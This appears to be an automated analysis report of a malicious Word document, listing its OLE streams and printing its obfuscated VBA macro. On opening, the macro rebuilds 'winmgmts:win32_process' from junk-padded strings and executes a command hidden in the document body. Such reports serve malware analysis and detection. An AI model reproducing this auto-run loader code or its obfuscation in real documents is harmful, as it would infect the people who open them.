njKwJdA
"GqMIEnOQFEEDsE"
bGMXEIA
eUdbDAHHs:
rtGyqOth
wuKBFvqI
hSbDPCC
hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
cSHkDL
blQEM
nKtfECko
RUMGE
Zpeehqbjjey.Create
uJSEDH.WriteLine
xNJyUCNg
"BQumCJmmiAGIKv"
yyoqEHETu
GNnZJzE
HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
yUWxTlVAC
TxAVq
EVOuqJnGD
"cnLcFxEphoEbAFA"
CksLJVJ
PmBxcD.Close
njKwJdA:
XsKjcKE
"GDTGdEJpuRnDBFQ"
"ZRotGHIxyrpSqvsXCC"
SOunIGkF
"]anw["
JhiYfXc
ChWZVJiB
lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
"OnehVAaWbfCAcAjsG"
iytziJ
"ohaTGaUTSwwDv"
"qMnfwCwbPJC"
"vRrzDEngIQvFPJfE"
zgBjJOGEH
tcYiEMeRH:
OBwIBy.Close
NtpdEJDH
gQxBD.WriteLine
"WMwcBSqFohy"
EUMDPGt.WriteLine
gQxBD.Close
PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
QrVtQr
VJbwzTDT
UPhhYZEF.WriteLine
uJSEDH.Close
Zpeehqbjjey
RNgUODjsM
NBjEFGnEA
oOysMtDG.Close
YzIkA
tcYiEMeRH
xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
"TOSxJaIzCudpDlB"
fUDmDCt
"utFMeJhUKJhJ"
aTfPCap
"SjDfYFUFPynYGu"
wCjuwBBGN
JHrNWdBsW
bPFNuJ.Close
XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
"rVpvDaGGxNfeNUF"
hiZkEEF.Close
Nothing
UPhhYZEF:
IYKcgC
dTtuVsDVA
VcIiQJFi
JhiYfXc.WriteLine
"jVSXGfhYCxoHFD"
lEOlGYxK
"ozrZBTZBTMMIBB"
hiZkEEF:
"goMgGBdJMUDLAG"
WtNcAKUFt
"MvkIFCHFTnRqD"
PmBxcD.WriteLine
rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
SynsDAgHG
"PFQdBLHsDnfTZv"
vitXEH
"OTLmJCwhyQMFzlB"
oUWfJGBeE
"OcgtIFEeoIFhxt"
Error
"lHuxHADjraNFBgI"
CCnbXRBeA
AiICOj
VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
CmcBTTABc
Attribute
CHKzNBD
TFXNGIiH
"cGDcNrWsPeGCDF"
LVadAF
mmkTuwH
eUdbDAHHs
Function
VbMBBgf
MfgnKGWI
ukrnIFCE
EbuwEJS
WxujBIAMz
DRrKpoA:
"dvqIBFEqwfkI"
kskMAAHA
OBwIBy.WriteLine
xCaTC
zLkRiC
DRrKpoA.WriteLine
"dxIGdcCHBKYgde"

VBA Code

Attribute VB_Name = "Oi5oelv0_s4"
Function Dn5440l_hb7()
On Error Resume Next
Pwpakrxjqhci6 = "H3c5_hufv8jcabt5" + "U58aumvxubigihzb"
sf4 = P1x1ag4qbt2iq + Wm_t404p8v_.StoryRanges.Item(2 / 2) + Swvko0y1qshqgm_
   GoTo VJbwzTDT
Dim ChWZVJiB As Object
Set RLurCDDF = EajdMLeD
Set ChWZVJiB = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim VJbwzTDT As Object
Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
VJbwzTDT.WriteLine "WMwcBSqFohy"
VJbwzTDT.WriteLine "HfXAPQQbXKJHFGu"
VJbwzTDT.WriteLine "GDTGdEJpuRnDBFQ"
Set XTdPHz = qpOWEIHHA
VJbwzTDT.Close
Set ChWZVJiB = Nothing
Set sGvJJWh = yjNpyrf
Set VJbwzTDT = Nothing
VJbwzTDT:
t3s = "]anw[3" + "p]anw[3"
Shahvgsluly1 = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
   GoTo JhiYfXc
Dim HnBvAEH As Object
Set cTfCJ = SynsDAgHG
Set HnBvAEH = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim JhiYfXc As Object
Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
JhiYfXc.WriteLine "akTuJaIGmZrUyF"
JhiYfXc.WriteLine "bAurYaGPwGKRiG"
JhiYfXc.WriteLine "dvqIBFEqwfkI"
Set pDPzBJmM = fUGQf
JhiYfXc.Close
Set HnBvAEH = Nothing
Set FPWaF = gglHam
Set JhiYfXc = Nothing
JhiYfXc:
H28xnqjqdre3n2g2t = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
   GoTo DRrKpoA
Dim xxYeFGUAH As Object
Set HMyHCQCGu = reTrs
Set xxYeFGUAH = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim DRrKpoA As Object
Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
DRrKpoA.WriteLine "gcZaHCGUVJsFmL"
DRrKpoA.WriteLine "OnehVAaWbfCAcAjsG"
DRrKpoA.WriteLine "ohaTGaUTSwwDv"
Set AiICOj = ukrnIFCE
DRrKpoA.Close
Set xxYeFGUAH = Nothing
Set blQEM = syDRd
Set DRrKpoA = Nothing
DRrKpoA:
Kyklcj8d5dak20povy = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
   GoTo AybxtEBCJ
Dim bGMXEIA As Object
Set VbMBBgf = wuKBFvqI
Set bGMXEIA = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim AybxtEBCJ As Object
Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
AybxtEBCJ.WriteLine "SjDfYFUFPynYGu"
AybxtEBCJ.WriteLine "yKdJWHAniqHFCB"
AybxtEBCJ.WriteLine "JCgblEAJizSfW"
Set cSHkDL = VwnpBElhO
AybxtEBCJ.Close
Set bGMXEIA = Nothing
Set SfMKIOk = RvFOAEPH
Set AybxtEBCJ = Nothing
AybxtEBCJ:
Pidl4mt91219jzdn = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"
   GoTo uJSEDH
Dim dLrgANHCG As Object
Set CHKzNBD = vitXEH
Set dLrgANHCG = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim uJSEDH As Object
Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
uJSEDH.WriteLine "ncDMUIadusSIDx"
uJSEDH.WriteLine "OcgtIFEeoIFhxt"
uJSEDH.WriteLine "cGDcNrWsPeGCDF"
Set numuq = oUWfJGBeE
uJSEDH.Close
Set dLrgANHCG = Nothing
Set XDJPUW = EJEApM
Set uJSEDH = Nothing
uJSEDH:
R0ty4lh4i_yv94lx8 = Kyklcj8d5dak20povy + Pidl4mt91219jzdn + H28xnqjqdre3n2g2t + t3s + Shahvgsluly1
   GoTo tcYiEMeRH
Dim RNgUODjsM As Object
Set WtNcAKUFt = YzIkA
Set RNgUODjsM = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim tcYiEMeRH As Object
Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
tcYiEMeRH.WriteLine "vRrzDEngIQvFPJfE"
tcYiEMeRH.WriteLine "lHuxHADjraNFBgI"
tcYiEMeRH.WriteLine "PzrrnIFtpmxAx"
Set rfDgD = CCnbXRBeA
tcYiEMeRH.Close
Set RNgUODjsM = Nothing
Set dTtuVsDVA = oMcHDXEF
Set tcYiEMeRH = Nothing
tcYiEMeRH:
Hb94758udqnr = Bp63ahh3hb4hyq(R0ty4lh4i_yv94lx8)
   GoTo gQxBD
Dim PAxhJ As Object
Set vtDUw = SOunIGkF
Set PAxhJ = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim gQxBD As Object
Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
gQxBD.WriteLine "WXovaGHxqSlUt"
gQxBD.WriteLine "goMgGBdJMUDLAG"
gQxBD.WriteLine "kWzGMzIVefGB"
Set CmcBTTABc = XsKjcKE
gQxBD.Close
Set PAxhJ = Nothing
Set MMAqSI = eWkHqVao
Set gQxBD = Nothing
gQxBD:
Set Zpeehqbjjey = CreateObject(Hb94758udqnr)
   GoTo RkPWCDPC
Dim xkJxAAC As Object
Set FgmzCEm = VfJHAA
Set xkJxAAC = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim RkPWCDPC As Object
Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
RkPWCDPC.WriteLine "jVSXGfhYCxoHFD"
RkPWCDPC.WriteLine "GqMIEnOQFEEDsE"
RkPWCDPC.WriteLine "DkRmTYGAMxqHI"
Set OtQPAJH = zOBhOx
RkPWCDPC.Close
Set xkJxAAC = Nothing
Set NtpdEJDH = XjhOHEMDC
Set RkPWCDPC = Nothing
RkPWCDPC:
Tz4pisa96444x1 = Mid(sf4, (1 + 4), Len(sf4))
   GoTo JADCpjk
Dim rEeiBJ As Object
Set jPnRGLC = waSbS
Set rEeiBJ = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim JADCpjk As Object
Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
JADCpjk.WriteLine "bOOXnOJYtbRAbm"
JADCpjk.WriteLine "eSpcpGDZncccrFb"
JADCpjk.WriteLine "fUwLgjVtQyH"
Set VusSK = QrVtQr
JADCpjk.Close
Set rEeiBJ = Nothing
Set CbMZSLFAM = MfgnKGWI
Set JADCpjk = Nothing
JADCpjk:
   GoTo eUdbDAHHs
Dim DyjPBI As Object
Set CksLJVJ = yUWxTlVAC
Set DyjPBI = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim eUdbDAHHs As Object
Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
eUdbDAHHs.WriteLine "OTLmJCwhyQMFzlB"
eUdbDAHHs.WriteLine "TthascRlxHZH"
eUdbDAHHs.WriteLine "frvvJFHIkftmZHE"
Set NBjEFGnEA = IYKcgC
eUdbDAHHs.Close
Set DyjPBI = Nothing
Set ORIzFDySE = ThHBBDu
Set eUdbDAHHs = Nothing
eUdbDAHHs:
Zpeehqbjjey.Create Bp63ahh3hb4hyq(Tz4pisa96444x1), Rua2q5h93ydvt, Ijq0g4n16u9apwecr
   GoTo njKwJdA
Dim XwZxsHCGt As Object
Set aLGptGA = QEIFFM
Set XwZxsHCGt = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim njKwJdA As Object
Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
njKwJdA.WriteLine "BQumCJmmiAGIKv"
njKwJdA.WriteLine "HiTyACJmCuGQFFJ"
njKwJdA.WriteLine "TJahKRWdrvHFIy"
Set NFWzF = rJqMZII
njKwJdA.Close
Set XwZxsHCGt = Nothing
Set xNJyUCNg = JHrNWdBsW
Set njKwJdA = Nothing
njKwJdA:
   GoTo PmBxcD
Dim rgBSB As Object
Set VAEDpBCV = PGiog
Set rgBSB = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim PmBxcD As Object
Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
PmBxcD.WriteLine "HwixyOCYxmojd"
PmBxcD.WriteLine "xtsHGQjpNzDIYJ"
PmBxcD.WriteLine "koDuGqAOJBlLgZIEme"
Set TxAVq = NSiRQzd
PmBxcD.Close
Set rgBSB = Nothing
Set aTfPCap = txKQv
Set PmBxcD = Nothing
PmBxcD:
End Function
Function Bp63ahh3hb4hyq(Tx84obagfrrh42q)
On Error Resume Next
   GoTo oOysMtDG
Dim xCaTC As Object
Set RUMGE = rtGyqOth
Set xCaTC = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim oOysMtDG As Object
Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
oOysMtDG.WriteLine "rVpvDaGGxNfeNUF"
oOysMtDG.WriteLine "dWnMFoTBPDqeJK"
oOysMtDG.WriteLine "budRDJKVnJRU"
Set GNnZJzE = wUoJIFDD
oOysMtDG.Close
Set xCaTC = Nothing
Set bGnhXCA = XKPUEfhk
Set oOysMtDG = Nothing
oOysMtDG:
T_dehutl_mggmhizd = Tx84obagfrrh42q
   GoTo hiZkEEF
Dim hSbDPCC As Object
Set EbuwEJS = xOnWA
Set hSbDPCC = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim hiZkEEF As Object
Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
hiZkEEF.WriteLine "bVawaPADALVlWFFA"
hiZkEEF.WriteLine "lRcGHADAHrlHJJA"
hiZkEEF.WriteLine "utFMeJhUKJhJ"
Set zOQlGPVC = kboRA
hiZkEEF.Close
Set hSbDPCC = Nothing
Set pSFXACJ = wCjuwBBGN
Set hiZkEEF = Nothing
hiZkEEF:
U0booztsqdpx = Y4o_ocvl0jti6oho0r(T_dehutl_mggmhizd)
   GoTo UPhhYZEF
Dim lEOlGYxK As Object
Set nKtfECko = HOkLRDGd
Set lEOlGYxK = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim UPhhYZEF As Object
Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
UPhhYZEF.WriteLine "ozrZBTZBTMMIBB"
UPhhYZEF.WriteLine "uJnfBHIPFKBxHBmEE"
UPhhYZEF.WriteLine "ZRotGHIxyrpSqvsXCC"
Set WxujBIAMz = eBddHTXP
UPhhYZEF.Close
Set lEOlGYxK = Nothing
Set mmkTuwH = TFXNGIiH
Set UPhhYZEF = Nothing
UPhhYZEF:
Bp63ahh3hb4hyq = U0booztsqdpx
   GoTo bPFNuJ
Dim VcIiQJFi As Object
Set yyoqEHETu = lgZgGO
Set VcIiQJFi = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim bPFNuJ As Object
Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
bPFNuJ.WriteLine "PFQdBLHsDnfTZv"
bPFNuJ.WriteLine "BWSOKPyHMnSQxi"
bPFNuJ.WriteLine "cnLcFxEphoEbAFA"
Set iytziJ = UMzHfyAfA
bPFNuJ.Close
Set VcIiQJFi = Nothing
Set kskMAAHA = zgBjJOGEH
Set bPFNuJ = Nothing
bPFNuJ:
End Function
Function Y4o_ocvl0jti6oho0r(Ra1p5i7j_mc3)
Vpeqsux9lcw7ketv_ = Lz6ghzf8pxt17d
   GoTo OBwIBy
Dim QZjuH As Object
Set SFmrEDJ = nIHrI
Set QZjuH = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim OBwIBy As Object
Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
OBwIBy.WriteLine "dxIGdcCHBKYgde"
OBwIBy.WriteLine "ALpzEMcwuWl"
OBwIBy.WriteLine "GhifcDKlpA"
Set WSARpB = yJouG
OBwIBy.Close
Set QZjuH = Nothing
Set FTalMbF = LVadAF
Set OBwIBy = Nothing
OBwIBy:
Y4o_ocvl0jti6oho0r = Replace(Ra1p5i7j_mc3, "]a" + "nw[3", W06apxljciw_nbacx)
   GoTo EUMDPGt
Dim UUoAB As Object
Set zLkRiC = fUDmDCt
Set UUoAB = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim EUMDPGt As Object
Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
EUMDPGt.WriteLine "TOSxJaIzCudpDlB"
EUMDPGt.WriteLine "qMnfwCwbPJC"
EUMDPGt.WriteLine "MvkIFCHFTnRqD"
Set EVOuqJnGD = ItSfCDCB
EUMDPGt.Close
Set UUoAB = Nothing
Set vutdEkdRL = ilONFzHG
Set EUMDPGt = Nothing
EUMDPGt:
End Function

VBA File Name: Qafkrimwsho, Stream Size: 697

General
Stream Path:	Macros/VBA/Qafkrimwsho
VBA File Name:	Qafkrimwsho
Stream Size:	697
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 ae c5 45 f2 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name
"Qafkrimwsho"

VBA Code
`Attribute VB_Name = "Qafkrimwsho"`

VBA File Name: Wm_t404p8v_, Stream Size: 1106

General
Stream Path:	Macros/VBA/Wm_t404p8v_
VBA File Name:	Wm_t404p8v_
Stream Size:	1106
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 ae c5 f3 f6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
Document_open()
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Wm_t404p8v_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Dn5440l_hb7
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 146

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	146
Entropy:	4.00187355764
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.279952994103
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 528

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	528
Entropy:	4.08784807247
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 e0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6424

General
Stream Path:	1Table
File Type:	data
Stream Size:	6424
Entropy:	6.13606471955
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 99189

General
Stream Path:	Data
File Type:	data
Stream Size:	99189
Entropy:	7.39018675385
Base64 Encoded:	True
Data ASCII:	u . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . { . . B g . . . m d . z . M . . . . . . . . . . . . D . . . . . . . . F . . . . . . { . . B g . . . m d . z . M . . . . . . . .
Data Raw:	75 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 488

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	488
Entropy:	5.44671163464
Base64 Encoded:	True
Data ASCII:	I D = " { 3 2 8 4 0 4 E F - 4 1 6 C - 4 D E 8 - 9 A 4 2 - 2 0 1 5 6 D 2 2 2 C 2 6 } " . . D o c u m e n t = W m _ t 4 0 4 p 8 v _ / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Q a f k r i m w s h o . . M o d u l e = O i 5 o e l v 0 _ s 4 . . E x e N a m e 3 2 = " T j 8 d t f s u o p d k " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 0 1 2 B 2 B 0 B 6 B 0 B 6 B 0 B 6 B 0 B 6 " . . D P B = " 8 2 8 0 2 0 5 0 9 3 5 1 9 3
